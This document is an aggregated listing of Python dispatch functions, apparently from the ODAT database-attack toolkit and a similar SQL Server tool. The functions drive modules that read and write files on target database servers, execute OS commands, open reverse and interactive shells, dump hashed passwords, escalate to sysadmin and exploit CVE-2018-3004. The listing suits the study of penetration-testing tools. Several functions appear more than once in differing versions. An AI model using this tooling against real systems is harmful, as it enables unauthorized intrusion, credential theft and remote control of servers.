Example #1
0
def runCtxsysModule(args):
    """
	Run the CTXSYS module
	"""
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    ctxsys = Ctxsys(args)
    status = ctxsys.connection(stopIfError=True)
    if args["test-module"] == True:
        args["print"].title("Test if the DBMSScheduler library can be used")
        status = ctxsys.testAll()
        # Option 1: read file
    if args["getFile"] != None:
        args["print"].title("Read the {0} file on the {1} server".format(args["getFile"], args["server"]))
        data = ctxsys.readAFile(args["getFile"])
        if isinstance(data, Exception):
            args["print"].badNews("Impossible to read the {0} file: {1}".format(args["getFile"], data))
        else:
            if data == "":
                args["print"].goodNews("The {0} file is empty or it doesn't exist".format(args["getFile"]))
            else:
                args["print"].goodNews(
                    "Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(args["getFile"], data)
                )
Example #2
0
def runTrustworthyPEModule(args):
	'''
	Run the TrustworthyPE module
	'''
	if checkOptionsGivenByTheUser(args,["test-module", "be-sysadmin", "drop-sysadmin","is-sysadmin"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	trustworthyPE = TrustworthyPE(args)
	trustworthyPE.connect()
	if args["sp-name"] != "": trustworthyPE.spName = args["sp-name"]
	if args["test-module"] == True: trustworthyPE.testAll()
	if args["be-sysadmin"] == True: 
		args['print'].title("Try to become sysadmin with the trustworthy database method")
		status = trustworthyPE.tryPE()
		if status == True:
			args['print'].goodNews("The current user is now sysadmin ! You should run again the all module to know what you can do...")
		else :
			args['print'].badNews("Impossible to put the sysadmin privilege to the current user with this method: {0}".format(status))	
	if args["drop-sysadmin"] == True:
		args['print'].title("Try to drop sysadmin privilege to the current user")
		continu = input("Do you want really drop sysadmin privilege of the current user (y/N) ").lower() == 'y'
		if continu == True:
			status = trustworthyPE.cleanPE()
			if status == True:
				args['print'].goodNews("Sysadmin privilege dropped for the current user")
			else :
				args['print'].badNews("Impossible to drop the sysadmin privilege for the current user: {0}".format(status))
		else:
			args['print'].badNews("Sysadmin privilege has not been modified")	
	if args["is-sysadmin"] == True:
		args['print'].title("Is the current user is sysadmin?")
		isSysadmin = trustworthyPE.isCurrentUserSysadmin()
		if isinstance(isSysadmin,Exception):
			args['print'].badNews("Impossible to know if the current user is sysadmin: {0}".format(isSysadmin))
		if isSysadmin == True: args['print'].goodNews("The current user is sysadmin")
		else: args['print'].goodNews("The current user is NOT sysadmin")
Example #3
0
def runSearchModule(args):
	'''
	Run the Search module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","column-names","pwd-column-names"]) == False : return EXIT_MISS_ARGUMENT
	search = Search(args)
	status = search.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the Search module can be used")
		status = search.testAll()
	if args.has_key('column-names')==True and args['column-names']!=None:
		args['print'].title("Columns which contains the pattern '{0}'".format(args['column-names']))
		table = search.searchInColumns(args['column-names'],showEmptyColumns=args['show-empty-columns'])
		if search.isEmptyTable(table) == True :
			args['print'].badNews("no result found")
		else :
			args['print'].goodNews(table)
	if args['pwd-column-names']==True:
		args['print'].title("Columns which contains the pattern ~password~ like (multi language)")
		table = search.searchPwdKeyworkInColumnNames(showEmptyColumns=args['show-empty-columns'])
		if search.isEmptyTable(table) == True :
                        args['print'].badNews("no result found")
                else :
                        args['print'].goodNews(table)
Example #4
0
def runDbmsXslprocessorModule(args):
    """
	Run the DbmsXslprocessor module
	"""
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsXslprocessor = DbmsXslprocessor(args)
    status = dbmsXslprocessor.connection(stopIfError=True)
    if args["test-module"] == True:
        args["print"].title("Test if the DBMSAdvisor library can be used")
        status = dbmsXslprocessor.testAll()
        # Option 1: putLocalFile
    if args["putFile"] != None:
        args["print"].title(
            "Put the {0} local file in the {1} path (named {2}) of the {3} server".format(
                args["putFile"][2], args["putFile"][0], args["putFile"][1], args["server"]
            )
        )
        status = dbmsXslprocessor.putFile(args["putFile"][0], args["putFile"][1], localFile=args["putFile"][2])
        if status == True:
            args["print"].goodNews(
                "The {0} local file was put in the remote {1} path (named {2})".format(
                    args["putFile"][2], args["putFile"][0], args["putFile"][1]
                )
            )
        else:
            args["print"].badNews(
                "The {0} local file was not put in the remote {1} path (named {2}): {3}".format(
                    args["putFile"][2], args["putFile"][0], args["putFile"][1], str(status)
                )
            )
    dbmsXslprocessor.close()
Example #5
0
def runDbmsSchedulerModule(args):
    '''
	Run the DBMSAdvisor module
	'''
    status = True
    if checkOptionsGivenByTheUser(
            args, ["test-module", "exec", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsScheduler = DbmsScheduler(args)
    status = dbmsScheduler.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        status = dbmsScheduler.testAll()
    #Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(
            args['exec'], args['server']))
        status = dbmsScheduler.execOSCommand(args['exec'])
        if status == True:
            args['print'].goodNews(
                "The `{0}` command was executed on the {1} server".format(
                    args['exec'], args['server']))
        else:
            args['print'].badNews(
                "The `{0}` command was not executed on the {1} server: {2}".
                format(args['exec'], args['server'], str(status)))
        dbmsScheduler.__getJobStatus__()
    #Option 2: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title(
            "Try to give you a reverse shell from the {0} server".format(
                args['server']))
        dbmsScheduler.giveReverseShell(localip=args['reverse-shell'][0],
                                       localport=args['reverse-shell'][1])
    dbmsScheduler.close()
Example #6
0
def runPasswordsModule(args):
	'''
	Run the Passwords module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","info","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT
	passwords = Passwords(args)
	status = passwords.connection(stopIfError=True)
	if args.has_key('info')==False:
		info = Info(args)
		info.loadInformationRemoteDatabase()
		args['info'] = info
	if args['test-module'] == True :
		args['print'].title("Test if hashed passwords can be got")
		status = passwords.testAll()
	if args['get-passwords'] == True :
		args['print'].title("Try to get Oracle hashed passwords")
		status = passwords.__tryToGetHashedPasswords__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else : 
			args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
	if args['get-passwords-from-history'] == True :
		args['print'].title("Try to get Oracle hashed passwords from history")
		status = passwords.__tryToGetHashedPasswordsfromHistory__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else : 
			args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
Example #7
0
def runDbmsSchedulerModule(args):
	'''
	Run the DBMSAdvisor module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","exec","reverse-shell"]) == False : return EXIT_MISS_ARGUMENT
	dbmsScheduler = DbmsScheduler(args)
	status = dbmsScheduler.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the DBMSScheduler library can be used")
		status = dbmsScheduler.testAll()
	#Option 1: exec
	if args['exec'] != None:
		args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server']))
		status = dbmsScheduler.execOSCommand(args['exec'])
		if status == True:
			args['print'].goodNews("The `{0}` command was executed on the {1} server".format(args['exec'],args['server']))
		else :
			args['print'].badNews("The `{0}` command was not executed on the {1} server: {2}".format(args['exec'],args['server'],str(status)))
		dbmsScheduler.__getJobStatus__()
	#Option 2: reverse shell
	if args['reverse-shell'] != None :
		args['print'].title("Try to give you a reverse shell from the {0} server".format(args['server']))
		dbmsScheduler.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1])
	dbmsScheduler.close()
Example #8
0
def runUnwrapperModule(args):
	'''
	Run the unwrapper module
	'''
	status, offline = True, True
	if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
		logging.critical("You must choose --test-module or/and --object-name or/and --file")
		return EXIT_MISS_ARGUMENT
	if args['file'] != None:
		offline = True
		unwrapper = Unwrapper(args, offline=True)
	if args['object-name'] != None:
		if checkOptionsGivenByTheUser(args,["test-module","object-name"]) == False : return EXIT_MISS_ARGUMENT
		offline = False
		unwrapper = Unwrapper(args, offline=False)
		unwrapper.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the Unwrapper module can be used")
		unwrapper.testAll()
	if args['object-name'] != None :
		args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
		code = unwrapper.unwrapRemotely(args['object-name'])
		if code == None: args['print'].badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...")
		else: args['print'].goodNews(code)
	if args['file'] != None :
		args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
		code = unwrapper.unwrapLocally(args['file'])
		if code == None: args['print'].badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...")
		else: args['print'].goodNews(code)
Example #9
0
def runJobsModule(args):
	'''
	Run the Jobs module
	'''
	if checkOptionsGivenByTheUser(args,["test-module", "exec", "reverse-shell","print-jobs"], checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	cmdType = ""
	jobs = Jobs(args)
	jobs.connect()
	if args["sleep-status"] != "": jobs.sleepStatus = args["sleep-status"]
	if args["sp-name"] != "": jobs.spName = args["sp-name"]
	if args["test-module"] == True: jobs.testAll()
	if args["exec"] != None: 
		args['print'].title("Try to execute the system command with SQL Server Agent Stored Procedures (Jobs)")
		if args["type"] != "": cmdType = args["type"]
		else: cmdType = "CMDEXEC"
		status = jobs.createAndExecuteJob(cmd=args["exec"], descritpion="MDAT", cmdType=cmdType, serverName="(LOCAL)")
		if status != True:
			args['print'].badNews("Impossible to create a job and to execute it: {0}".format(status))
		else:
			status = jobs.getJobStatus()
			if status == True:
				args['print'].goodNews("The job to execute the system command has been created and executed")
			elif status == False:
				args['print'].badNews("The job to execute the system command has not been executed because there is probably a mistake in your command")
			elif status == None:
				args['print'].unknownNews("The job status is unknown because it is still running")
			else :
				args['print'].badNews("The system command has NOT been executed on the database server: {0}".format(status))
	if args["reverse-shell"] != None: 
		args['print'].title("Try to give you a reverse shell with SQL Server Agent Stored Procedures (Jobs)")
		status = jobs.getInteractiveReverseShell(args['reverse-shell'][0], args['reverse-shell'][1])
	if args["print-jobs"] != None:
		args['print'].title("Print list of agent jobs")
		jobs.printJobs()
Example #10
0
def runOradbgModule(args):
    '''
	Run the Oradbg module
	'''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    oradbg = Oradbg(args)
    status = oradbg.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Oradbg can be used")
        status = oradbg.testAll()
    #Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(
            args['exec'], args['server']))
        status = oradbg.execOSCommand(args['exec'])
        if status == True:
            args['print'].goodNews(
                "The `{0}` command was executed on the {1} server (probably)".
                format(args['exec'], args['server']))
        else:
            args['print'].badNews(
                "The `{0}` command was not executed on the {1} server: {2}".
                format(args['exec'], args['server'], str(status)))
    oradbg.close()
Example #11
0
def runPasswordsModule(args):
	'''
	Run the Passwords module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history"]) == False : return EXIT_MISS_ARGUMENT
	passwords = Passwords(args)
	status = passwords.connection(stopIfError=True)
	if args.has_key('info')==False:
		info = Info(args)
		info.loadInformationRemoteDatabase()
		args['info'] = info
	if args['test-module'] == True :
		args['print'].title("Test if hashed passwords can be got")
		status = passwords.testAll()
	if args['get-passwords'] == True :
		args['print'].title("Try to get Oracle hashed passwords")
		status = passwords.__tryToGetHashedPasswords__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else : 
			args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
	if args['get-passwords-from-history'] == True :
		args['print'].title("Try to get Oracle hashed passwords from history")
		status = passwords.__tryToGetHashedPasswordsfromHistory__()
		if status == True :
			args['print'].goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else : 
			args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
Example #12
0
def runHttpUriTypeModule(args):
	'''
	Run the HTTPURITYPE module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","httpUrl","scan-ports"]) == False : return EXIT_MISS_ARGUMENT
	httpUriType = HttpUriType(args)
	status = httpUriType.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the HTTPURITYPE library can be used")
		status = httpUriType.testAll()
	#Option 1: httpUrl
	if args['httpUrl'] != None:
		args['print'].title("Send a GET request from {0} to {1}".format(args['connectionStr'],args['httpUrl']))
		response = httpUriType.sendGetRequest(url=args['httpUrl'])
		if isinstance(response,Exception):
			args['print'].badNews("HTTP GET request failed")
		else :
			args['print'].goodNews("The server response is:\n {0}".format(response))
			if args['outputFile'] != None : httpUriType.writeFile(args['outputFile'],str(response))
	#Option 2: scan-ports
	if args['scan-ports'] != None:
		ports = []
		if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',')
		elif '-' in args['scan-ports'][1]:
			startEnd = args['scan-ports'][1].split('-')
			for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort))
		else : logging.error("Syntax for ports given not recognized (ex: 123-2452 or 143,134,4783)")
		args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0]))
		resultats = httpUriType.scanTcpPorts(httpObject=httpUriType,ip=args['scan-ports'][0],ports=ports)
		httpUriType.printScanPortResults(resultats)
	httpUriType.close()
Example #13
0
def runjavaModule(args):
	'''
	Run the JAVA module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]) == False : return EXIT_MISS_ARGUMENT
	java = Java(args)
	status = java.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the DBMSScheduler library can be used")
		status = java.testAll()
	#Option 1: exec
	if args['exec'] != None:
		args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server']))
		status = java.execOSCommand(cmd=args['exec'],printResponse=True, needCreateClassAndFunction = True, needDeleteClassAndFunction = True)
	#Option 2: shell
	if args['shell'] == True:
		args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
		java.getInteractiveShell()
	#Option 3: reverse shell
	if args['reverse-shell'] != None :
		args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
		java.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1])
	#Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004)
	if args['create-file-CVE-2018-3004'] != None :
		args['print'].title("Try to create the file {0} on {1}".format(args['create-file-CVE-2018-3004'][1],args['server']))
		status = java.createOrAppendFileViaCVE_2018_3004(data=args['create-file-CVE-2018-3004'][0], remoteFilename=args['create-file-CVE-2018-3004'][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to create the file {0}: {1}".format(args['create-file-CVE-2018-3004'][1], status))
		elif status==True: 
			args['print'].goodNews("The file {0} has been created on the target with data '{1}'".format(args['create-file-CVE-2018-3004'][1], args['create-file-CVE-2018-3004'][0]))
	java.close()
Example #14
0
def runTnsCmdModule(args):
    '''
	run the TNS cmd module
	'''
    if checkOptionsGivenByTheUser(args, ["version", "status", "ping"],
                                  checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    #if args['ping'] == False and args['version'] == False and args['status'] == False and args['checkTNSPoisoning'] == False:
    #	logging.critical("You must choose --ping or/and --version or/and --status")
    #	return EXIT_MISS_ARGUMENT
    tnscmd = Tnscmd(args)
    if args['ping'] == True:
        args['print'].title(
            "Searching ALIAS on the {0} server, port {1}".format(
                args['server'], args['port']))
        alias = tnscmd.getAlias()
        args['print'].goodNews(
            "{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID."
            .format(len(alias), alias))
    if args['version'] == True:
        args['print'].title(
            "Searching the version of the Oracle database server ({0}) listening on the port {1}"
            .format(args['server'], args['port']))
        version = tnscmd.getVersion()
        args['print'].goodNews(
            "The remote database version is: '{0}'".format(version))
    if args['status'] == True:
        args['print'].title(
            "Searching the server status of the Oracle database server ({0}) listening on the port {1}"
            .format(args['server'], args['port']))
        tnscmd.getInformation(cmd='status')
        args['print'].goodNews(
            "Data received by the database server: '{0}'".format(
                tnscmd.getRecvData()))
Example #15
0
File: UtlTcp.py Project: 6zq/odat
def runUtlTcpModule(args):
	'''
	Run the UTL_TCP module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","send-packet","scan-ports"]) == False : return EXIT_MISS_ARGUMENT
	utlTcp = UtlTcp(args)
	status = utlTcp.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the UTL_TCP library can be used")
		status = utlTcp.testAll()
	#Option 2: send packet
	if args['send-packet'] != None:
		args['print'].title("Send the packet stored in the {0} file".format(args['send-packet'][2]))
		data = utlTcp.sendPacket(args['send-packet'][0],args['send-packet'][1],filename=args['send-packet'][2])
		if isinstance(data,Exception): 
			args['print'].badNews("Impossible to send the packet: {0}".format(data))
		else : 
			args['print'].goodNews("Response from the server:\n{0}".format(data))
	#Option 1: tcp Scan
	if args['scan-ports'] != None:
		ports = []
		if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',')
		elif '-' in args['scan-ports'][1]:
			startEnd = args['scan-ports'][1].split('-')
			for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort))
		else : logging.error("Syntax for ports given not recognized")
		args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0]))
		resultats = utlTcp.scanTcpPorts(httpObject=utlTcp,ip=args['scan-ports'][0],ports=ports)
		utlTcp.printScanPortResults(resultats)
	utlTcp.close()
Example #16
0
def runjavaModule(args):
    '''
	Run the JAVA module
	'''
    status = True
    if checkOptionsGivenByTheUser(
            args, ["test-module", "shell", "reverse-shell", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    status = java.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        status = java.testAll()
    #Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(
            args['exec'], args['server']))
        status = java.execOSCommand(cmd=args['exec'],
                                    printResponse=True,
                                    needCreateClassAndFunction=True,
                                    needDeleteClassAndFunction=True)
    #Option 2: shell
    if args['shell'] == True:
        args['print'].title(
            "Try to give you a pseudo shell to the {0} server".format(
                args['server']))
        java.getInteractiveShell()
    #Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title(
            "Try to give you a nc reverse shell from the {0} server".format(
                args['server']))
        java.giveReverseShell(localip=args['reverse-shell'][0],
                              localport=args['reverse-shell'][1])
    java.close()
Example #17
0
def runDbmsLob(args):
    '''
	Run the DbmsLob module
	'''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsLob = DbmsLob(args)
    status = dbmsLob.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DbmsLob module can be used")
        status = dbmsLob.testAll()
    #Option 1: getFile
    if args['getFile'] != None:
        args['print'].title("Read the {0} file stored in the {1} path".format(
            args['getFile'][1], args['getFile'][0]))
        data = dbmsLob.getFile(remotePath=args['getFile'][0],
                               remoteNameFile=args['getFile'][1],
                               localFile=args['getFile'][2])
        if isinstance(data, Exception):
            args['print'].badNews("There is an error: {0}".format(data))
        elif data == False:
            args['print'].badNews("The {0} file in {1} doesn't exist".format(
                args['getFile'][1], args['getFile'][0]))
        elif data == '':
            args['print'].badNews("The {0} file is empty".format(
                args['getFile']))
        else:
            args['print'].goodNews(
                "Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}"
                .format(args['getFile'][1], args['getFile'][0],
                        args['getFile'][2], data))
Example #18
0
def runPasswordStealerModule(args):
    '''
	Run the PasswordGuesser module
	'''
    if checkOptionsGivenByTheUser(args, ["dump"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    passwordstealer = Passwordstealer(args)
    passwordstealer.connect()
    if args["test-module"] == True: passwordstealer.testAll()
    args['print'].title(
        "It is stealing hashed passwords from sql_logins table or sysxlogins table"
    )
    status = passwordstealer.stealHashedPasswords()
    passwordstealer.closeConnection()
    if status == True:
        if passwordstealer.credentialsAreEmpty() == True:
            args['print'].badNews(
                "No found hashed passwords on {0}:{1}/{2}".format(
                    args['host'], args['port'], args['database']))
        else:
            args['print'].goodNews("Accounts found on {0}:{1}/{2}:".format(
                args['host'], args['port'], args['database']))
            passwordstealer.printPasswords()
        if args['save-to-file']:
            args['print'].goodNews(
                "Credentials have been saved in the file {0}".format(
                    args['save-to-file']))
    else:
        args['print'].badNews(
            "impossible to steal hashed passwords from sql_logins table or sysxlogins table"
        )
Example #19
0
def runCtxsysModule(args):
    '''
	Run the CTXSYS module
	'''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    ctxsys = Ctxsys(args)
    status = ctxsys.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        status = ctxsys.testAll()
    #Option 1: read file
    if args['getFile'] != None:
        args['print'].title("Read the {0} file on the {1} server".format(
            args['getFile'], args['server']))
        data = ctxsys.readAFile(args['getFile'])
        if isinstance(data, Exception):
            args['print'].badNews(
                "Impossible to read the {0} file: {1}".format(
                    args['getFile'], data))
        else:
            if data == '':
                args['print'].goodNews(
                    "The {0} file is empty or it doesn't exist".format(
                        args['getFile']))
            else:
                args['print'].goodNews(
                    "Data stored in the {0} file (escape char replace by '\\n'):\n{1}"
                    .format(args['getFile'], data))
Example #20
0
def runjavaModule(args):
	'''
	Run the JAVA module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]) == False : return EXIT_MISS_ARGUMENT
	java = Java(args)
	status = java.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the DBMSScheduler library can be used")
		status = java.testAll()
	#Option 1: exec
	if args['exec'] != None:
		args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server']))
		status = java.execOSCommand(cmd=args['exec'],printResponse=True, needCreateClassAndFunction = True, needDeleteClassAndFunction = True)
	#Option 2: shell
	if args['shell'] == True:
		args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
		java.getInteractiveShell()
	#Option 3: reverse shell
	if args['reverse-shell'] != None :
		args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
		java.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1])
	#Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004)
	if args['create-file-CVE-2018-3004'] != None :
		args['print'].title("Try to create the file {0} on {1}".format(args['create-file-CVE-2018-3004'][1],args['server']))
		status = java.createOrAppendFileViaCVE_2018_3004(data=args['create-file-CVE-2018-3004'][0], remoteFilename=args['create-file-CVE-2018-3004'][1])
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to create the file {0}: {1}".format(args['create-file-CVE-2018-3004'][1], status))
		elif status==True: 
			args['print'].goodNews("The file {0} has been created on the target with data '{1}'".format(args['create-file-CVE-2018-3004'][1], args['create-file-CVE-2018-3004'][0]))
	java.close()
Example #21
0
def runExternalTableModule (args):
	'''
	Run the External Table module
	'''
	status = True
	if checkOptionsGivenByTheUser(args,["test-module","getFile","exec"]) == False : return EXIT_MISS_ARGUMENT
	externalTable = ExternalTable(args)
	status = externalTable.connection(stopIfError=True)
	if args['test-module'] == True :
		args['print'].title("Test if the External Table module can be used")
		status = externalTable.testAll()
	#Option 1: getFile
	if args['getFile'] != None:
		args['print'].title("Read the {0} file stored in the {1} path".format(args['getFile'][1],args['getFile'][0]))
		data = externalTable.getFile (remotePath=args['getFile'][0], remoteNameFile=args['getFile'][1], localFile=args['getFile'][2])
		if isinstance(data,Exception):
			args['print'].badNews("There is an error: {0}".format(data))
		else:
			args['print'].goodNews("Data stored in the remote file {0} stored in {1}".format(args['getFile'][1],args['getFile'][0]))
			print(data)
	#Option 2: exec a script or command
	if args['exec'] != None:
		args['print'].title("Execute the {0} command stored in the {1} path".format(args['exec'][1],args['exec'][0]))
		data = externalTable.execute (remotePath=args['exec'][0], remoteNameFile=args['exec'][1])
		if isinstance(data,Exception):
			args['print'].badNews("There is an error: {0}".format(data))
		else:
			args['print'].goodNews("The {0} command stored in {1} has been executed (normally)".format(args['exec'][1],args['exec'][0]))
Example #22
0
def runUnwrapperModule(args):
	'''
	Run the unwrapper module
	'''
	status, offline = True, True
	if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
		logging.critical("You must choose --test-module or/and --object-name or/and --file")
		return EXIT_MISS_ARGUMENT
	if args['test-module'] == True :
		args['print'].title("Test if the Unwrapper module can be used")
		unwrapper = Unwrapper(args, offline=False)
		unwrapper.testAll()
	if args['file'] != None:
		offline = True
		unwrapper = Unwrapper(args, offline=True)
	if args['object-name'] != None:
		if checkOptionsGivenByTheUser(args,["test-module","object-name"]) == False : return EXIT_MISS_ARGUMENT
		offline = False
		unwrapper = Unwrapper(args, offline=False)
		unwrapper.connection(stopIfError=True)
	#if args['object-name'] != None :
		args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
		code = unwrapper.unwrapRemotely(args['object-name'], objectType = args['object-type'])
		if code == None: args['print'].badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...")
		else: args['print'].goodNews(code)
	if args['file'] != None :
		args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
		code = unwrapper.unwrapLocally(args['file'])
		if code == None: args['print'].badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...")
		else: args['print'].goodNews(code)
Example #23
0
def runExternalTableModule(args):
    """
	Run the External Table module
	"""
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    externalTable = ExternalTable(args)
    status = externalTable.connection(stopIfError=True)
    if args["test-module"] == True:
        args["print"].title("Test if the External Table module can be used")
        status = externalTable.testAll()
        # Option 1: getFile
    if args["getFile"] != None:
        args["print"].title("Read the {0} file stored in the {1} path".format(args["getFile"][1], args["getFile"][0]))
        data = externalTable.getFile(
            remotePath=args["getFile"][0], remoteNameFile=args["getFile"][1], localFile=args["getFile"][2]
        )
        if isinstance(data, Exception):
            args["print"].badNews("There is an error: {0}".format(data))
        else:
            args["print"].goodNews(
                "Data stored in the remote file {0} stored in {1}".format(args["getFile"][1], args["getFile"][0])
            )
            print data
            # Option 2: exec a script or command
    if args["exec"] != None:
        args["print"].title("Execute the {0} command stored in the {1} path".format(args["exec"][1], args["exec"][0]))
        data = externalTable.execute(remotePath=args["exec"][0], remoteNameFile=args["exec"][1])
        if isinstance(data, Exception):
            args["print"].badNews("There is an error: {0}".format(data))
        else:
            args["print"].goodNews(
                "The {0} command stored in {1} has been executed (normally)".format(args["exec"][1], args["exec"][0])
            )
Example #24
0
def runDbmsadvisorModule(args):
    '''
	Run the DBMSAdvisor module
	'''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsAdvisor = DbmsAdvisor(args)
    status = dbmsAdvisor.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSAdvisor library can be used")
        status = dbmsAdvisor.testAll()
    #Option 1: putLocalFile
    if args['putFile'] != None:
        args['print'].title(
            "Put the {0} local file in the {1} path (named {2}) of the {3} server"
            .format(args['putFile'][2], args['putFile'][0], args['putFile'][1],
                    args['server']))
        status = dbmsAdvisor.putFile(args['putFile'][0],
                                     args['putFile'][1],
                                     localFile=args['putFile'][2])
        if status == True:
            args['print'].goodNews(
                "The {0} local file was put in the remote {1} path (named {2})"
                .format(args['putFile'][2], args['putFile'][0],
                        args['putFile'][1]))
        else:
            args['print'].badNews(
                "The {0} local file was not put in the remote {1} path (named {2}): {3}"
                .format(args['putFile'][2], args['putFile'][0],
                        args['putFile'][1], str(status)))
    dbmsAdvisor.close()
Example #25
0
def runOleAutomationModule(args):
	'''
	Run the runOleAutomation module
	'''
	if checkOptionsGivenByTheUser(args,["read-file","write-file","get-file","put-file","exec-sys-cmd","enable-ole-automation","disable-ole-automation"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	oleAutomation = OleAutomation(args)
	oleAutomation.connect()
	if args["test-module"] == True: oleAutomation.testAll()
	if args["enable-ole-automation"] ==True:
		args['print'].title("Try to enable OLE Automation")
		status = oleAutomation.enableOLEAutomationProcedures()
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to enable OLE Automation: '{0}'".format(status))
		else:
			args['print'].goodNews("OLE Automation is enabled")
	if args["read-file"] != None:
		args['print'].title("Try to read the remote file {0}".format(args['read-file'][0]))
		data = oleAutomation.readFile(args['read-file'][0])
		if isinstance(data,Exception): 
			args['print'].badNews("The file can't be read: '{0}'".format(data))
		else:
			args['print'].goodNews("Data in the file {0}:\n{1}".format(args['read-file'][0],data))
	if args["write-file"] != None:
		args['print'].title("Try to write this data on the remote file {0}: '{1}'".format(args['write-file'][0],args['write-file'][1]))
		data = oleAutomation.writeFile(args['write-file'][0],args['write-file'][1])
		if isinstance(data,Exception):
			args['print'].badNews("Data cannot be written: '{0}'".format(data))
		else:
